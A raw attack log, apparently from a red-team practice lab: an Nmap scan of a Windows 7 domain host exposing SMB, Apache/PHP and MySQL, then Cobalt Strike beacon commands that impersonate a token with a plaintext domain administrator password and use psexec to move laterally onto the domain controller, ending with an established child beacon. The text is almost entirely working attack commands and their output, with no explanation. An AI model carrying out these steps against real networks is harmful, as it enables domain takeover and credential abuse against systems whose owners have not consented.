Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-27 21:31 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.0.162
Host is up (0.0098s latency).
Not shown: 992 closed tcp ports (conn-refused)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.5.38)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: SUN)
3306/tcp  open  mysql        MySQL (unauthorized)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 00:0C:29:B9:F4:45 (VMware)
Device type: general purpose|media device
Running: Microsoft Windows 2008|10|7|8.1, Microsoft embedded
OS CPE: cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_10 cpe:/h:microsoft:xbox_one cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows Server 2008 SP2, Microsoft Windows Server 2008 SP2 or Windows 10 or Xbox One, Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: Host: WIN7; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: WIN7, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:b9:f4:45 (VMware)
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: -1s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: win7
|   NetBIOS computer name: WIN7\x00
|   Domain name: sun.com
|   Forest name: sun.com
|   FQDN: win7.sun.com
|_  System time: 2021-12-27T21:32:33+08:00
| smb2-security-mode:
|   2.1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-12-27T13:32:33
|_  start_date: 2021-12-24T10:19:01

TRACEROUTE
HOP RTT     ADDRESS
1   9.84 ms 192.168.0.162

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.16 seconds
beacon> rev2self
beacon> make_token SUN\Administrator hongrisec@2019
beacon> jump psexec DC    (DC: domain controller)
[+] host called home, sent: 58 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[*] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\msagent_2835) on DC via Service Control Manager (\\DC\ADMIN$\79a9e06.exe)
[+] host called home, sent: 285790 bytes
[+] received output:
Started service 79a9e06 on DC
[+] host called home, sent: 74 bytes
[+] established link to child beacon: 192.168.138.138